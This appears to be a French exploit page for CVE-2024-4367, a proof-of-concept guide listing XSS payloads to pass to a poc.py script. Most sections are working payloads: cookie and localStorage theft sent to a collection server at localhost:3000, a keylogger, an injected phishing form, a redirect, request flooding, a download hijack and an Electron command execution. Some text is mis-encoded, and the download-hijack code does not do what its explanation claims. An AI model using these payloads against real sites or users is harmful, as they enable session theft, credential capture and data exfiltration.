Share
## https://sploitus.com/exploit?id=8C124383-64E0-5FB0-9430-425AF5EAC612
# CVE 2024 4367: PoC pour l'exploitation de XSS (Cross-Site Scripting)


### 1. **Affichage d'un Alerte (Déclenchement XSS)**
Un autre exemple d'exploitation consiste à injecter un simple message d'alerte pour vérifier si l'attaque fonctionne.

```python
python poc.py "alert('XSS exploit triggered');"
```
- **Explication** : Ce code injecte une pop-up d'alerte dans la page, ce qui permet de tester rapidement si l'exploit XSS est exécuté sur le site cible.

---

### 2. **Vol de Cookies**
L'attaque XSS peut ĂȘtre utilisĂ©e pour voler les cookies de la victime et les envoyer Ă  un serveur malveillant.

```python
python poc.py "fetch('http://localhost:3000/cookie', {method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({cookie: document.cookie})});"
```
- **Explication** : Le script modifie l'URL de la page pour inclure les cookies de la victime, qui sont ensuite envoyés à un serveur malveillant (`http://localhost:3000/cookie`).

---

### 3. **Vol de Données Stockées Localement (LocalStorage)**
L'attaquant peut voler des informations sensibles stockées dans le `localStorage` de la victime, comme des données d'authentification ou des informations de session.

```python
python poc.py "fetch('http://localhost:3000/localstorage', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({localstorage: JSON.stringify(localStorage)})});"
```
- **Explication** : Le code rĂ©cupĂšre les donnĂ©es sensibles stockĂ©es dans le `localStorage` et les envoie Ă  un serveur malveillant via une requĂȘte `fetch`.

---

### 4. **Redirection Malveillante**
L'attaquant peut rediriger la victime vers un site malveillant afin de récupérer des informations supplémentaires ou de charger un autre exploit.

```shell
python poc.py "window.location.href='http://localhost:3000';"
```
- **Explication** : Ce script redirige immĂ©diatement la victime vers un site malveillant, ce qui peut ĂȘtre utilisĂ© dans des attaques de phishing ou pour installer des logiciels malveillants.

---

### 5. **Attaque par DDoS (Flooding d'API)**
Un autre type d'attaque consiste Ă  inonder un serveur avec des requĂȘtes, ce qui peut mener Ă  une dĂ©gradation des performances ou Ă  une interruption du service.

```shell
python poc.py  "for (let i = 0; i < 100; i++) { fetch('http://localhost:3000/api'); }"
```
- **Explication** : Le script envoie 100 requĂȘtes HTTP Ă  une API cible, ce qui peut entraĂźner une surcharge du serveur (attaque par dĂ©ni de service).

---

### 6. **Keylogger (Vol de frappes clavier)**
L'attaquant peut intercepter les frappes clavier de la victime, ce qui lui permet de récupérer des informations sensibles comme des mots de passe ou des identifiants.

```shell
python poc.py """document.addEventListener('keydown', function(e) {
    fetch('http://localhost:3000/keylogger?key=' + e.key);
});"""
```
- **Explication** : Ce script enregistre chaque touche frappée par la victime et envoie ces informations à un serveur malveillant.

---

### 7. **Phishing via Formulaire Injecté (Vol de données sensibles)**
Un attaquant peut utiliser XSS pour injecter un formulaire de phishing dans une page Web et ainsi voler des informations sensibles (ex. : mot de passe, nom d'utilisateur).

```shell
python poc.py """
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://localhost:3000/phishing';
var input = document.createElement('input');
input.type = 'text';
input.name = 'username';
form.appendChild(input);
document.body.appendChild(form);
form.submit();
"""
```
- **Explication** : Ce code injecte un formulaire dans la page, permettant à l'attaquant de récupérer des informations sensibles que l'utilisateur soumet à travers ce formulaire de phishing.

---

### 8. Usurpation
Si l'utilisateur va cliquer sur un bouton de téléchargement, nous allons changer la cible du téléchargement.

```js
const a = document.createElement('a');
a.href = "https://example.com/fichier.pdf";
a.download = "fichier.pdf"; 
document.body.appendChild(a);
a.click();
document.body.removeChild(a);
```
- **Explication** : Ce script met à jour le lien d'un url de téléchargement,l'idée est de modifier un bouton existant pour qu'il télécharge un fichier malveillant à la place de celui prévu par l'utilisateur.

---

### 9. **Attaques sur Applications de Bureau (Electron, NW.js)**
```shell
python poc.py "require('child_process').exec('calc.exe')"
```
Les applications basĂ©es sur des frameworks comme Electron ou NW.js peuvent Ă©galement ĂȘtre affectĂ©es par des attaques XSS, car elles permettent d'intĂ©grer du contenu web dans des applications de bureau avec des accĂšs locaux Ă©tendus.     
Ces applications, en raison de leurs permissions, peuvent permettre Ă  un attaquant d'accĂ©der Ă  des fichiers locaux, d'exĂ©cuter des processus externes, ou mĂȘme de lancer d'autres applications sur la machine cible (par exemple, la calculatrice, un Ă©diteur de texte, etc.). Cela augmente considĂ©rablement la surface d'attaque, car ces applications combinent le pouvoir du web avec des accĂšs systĂšme plus larges.


---


## Conclusion
Les attaques exploitant les CVE (Common Vulnerabilities and Exposures) peuvent permettre de réaliser divers types d'attaques XSS. En exploitant des vulnérabilités spécifiques dans les applications web ou de bureau, un attaquant peut injecter du code malveillant, voler des informations sensibles, manipuler des sessions utilisateur, ou exécuter des actions malveillantes sur le systÚme cible